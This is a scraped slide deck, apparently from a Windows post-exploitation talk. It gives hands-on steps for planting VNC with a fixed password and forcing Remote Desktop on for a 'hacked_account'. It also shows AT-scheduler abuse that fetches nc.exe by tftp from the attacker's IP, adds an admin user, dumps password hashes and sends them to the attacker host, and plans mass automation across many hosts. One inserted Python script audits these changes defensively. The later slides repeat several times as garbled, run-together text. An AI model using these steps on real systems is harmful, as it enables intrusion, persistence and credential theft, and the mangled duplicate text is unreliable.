• Enabling VNC (from the command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
     • winvnc.exe
     • vnc.reg
     • vnchooks.dll
     • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

  [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
  "SocketConnect"=dword:00000001
  "AutoPortSelect"=dword:00000001
  "InputsEnabled"=dword:00000001
  "LocalInputsDisabled"=dword:00000000
  "IdleTimeout"=dword:00000000
  "QuerySetting"=dword:00000002
  "QueryTimeout"=dword:0000000a
  "PollUnderCursor"=dword:00000000
  "PollForeground"=dword:00000001
  "PollFullScreen"=dword:00000000
  "OnlyPollConsole"=dword:00000001
  "OnlyPollOnEvent"=dword:00000000
  "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
     • Ex: a system controlling access to security doors
       – No command-line way of modifying the system; you need the GUI
     • SCADA systems
     • Security cameras
     • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

  [Unicode]
  Unicode=yes
  [Version]
  signature="$CHICAGO$"
  Revision=1
  [Privilege Rights]
  seremoteinteractivelogonright = hacked_account
  seinteractivelogonright = hacked_account
  sedenyinteractivelogonright =
  sedenyremoteinteractivelogonright =
  sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  "fDenyTSConnections"=dword:00000000
  "TSEnabled"=dword:00000001
  "TSUserEnabled"=dword:00000000

  – Then perform these commands:
     • sc config termservice start= auto
     • regedit /s enable_ts.reg
     • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
     • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
     • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
     • gpupdate /Force
     • net start "terminal services"
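As an added example (not from the talk or its tools), a small Python auditor that parses .reg and secedit template files of the kind shown on slides 53 and 54 and flags the changes a defender would want to catch in a change review or in a captured artifact: fDenyTSConnections flipped to 0, TSEnabled set, and logon rights granted or deny lists emptied. The sample inputs are reconstructed from the two slides; the placeholder account name is the slide's own.

```python
"""Audit .reg and secedit .inf/.ini text for the Terminal Server and
logon-right changes described on slides 53-54.  Added example, not the
talk's own tooling; the sample inputs below are constructed from the page."""

# Constructed sample: the enable_ts.reg file shown on slide 54.
ENABLE_TS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

# Constructed sample: the fix_ts_policy.ini file shown on slide 53, with the
# placeholder account name left exactly as the slide gives it.
FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
# Rights whose grant lets an account log on (remotely or at the console).
RIGHTS_GRANTED = ("seremoteinteractivelogonright", "seinteractivelogonright")


def parse_ini(text):
    """Parse INI-style text ([section] / key=value) into nested dicts.
    Works for .reg bodies and secedit templates alike; header lines such as
    'Windows Registry Editor Version 5.00' carry no '=' and are skipped.
    Value names lose their surrounding quotes; values stay raw so the
    caller can decode dword:/hex: forms."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            name, value = line.split("=", 1)
            sections[current][name.strip().strip('"')] = value.strip()
    return sections


def reg_value(raw):
    """Decode a .reg value: dword:XXXXXXXX -> int, hex:aa,bb -> bytes,
    anything else -> the string with surrounding quotes removed."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex:"):
        return bytes.fromhex(raw[4:].replace(",", ""))
    return raw.strip('"')


def audit_reg(text):
    """Return findings for Remote Desktop being switched on via the registry."""
    findings = []
    ts = parse_ini(text).get(TS_KEY, {})
    # Absent values default to the locked-down setting so only explicit
    # changes in the file produce findings.
    if ts and reg_value(ts.get("fDenyTSConnections", "dword:00000001")) == 0:
        findings.append("fDenyTSConnections set to 0: RDP connections enabled")
    if ts and reg_value(ts.get("TSEnabled", "dword:00000000")) == 1:
        findings.append("TSEnabled set to 1: Terminal Services enabled")
    return findings


def audit_secedit(text):
    """Return findings for logon-right grants and emptied deny lists in the
    [Privilege Rights] section of a secedit template."""
    findings = []
    rights = parse_ini(text).get("Privilege Rights", {})
    for name, value in rights.items():
        key = name.lower()
        accounts = [a.strip() for a in value.split(",") if a.strip()]
        if key in RIGHTS_GRANTED and accounts:
            findings.append(f"{name} granted to {', '.join(accounts)}")
        elif key.startswith("sedeny") and not accounts:
            findings.append(f"{name} cleared: deny list emptied")
    return findings


if __name__ == "__main__":
    for finding in audit_reg(ENABLE_TS_REG) + audit_secedit(FIX_TS_POLICY_INI):
        print("FINDING:", finding)
```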

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

  net use \\target\ipc$ password /user:username
  at \\target 12:00 pm command
  Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Add users
  – Mess with the registry and policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
     • Adds a user (net user hacked hacked /add)
       – Admin group (net localgroup administrators hacked /add)
     • Gets hash-dumping tools and dumps hashes
     • Sends the hashes, identified by IP, back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use, re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to
     • All the people from the offensivecomputing, nologin, uninformed IRC and SILC channels
     • HD Moore especially, for support and mentorship
     • Danny Quist, krbklepto, Egypt, spoonm, skape
     • Luke Jennings for his awesome work

Slide 69

• Questions
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 51: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 52: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 53: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 54: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
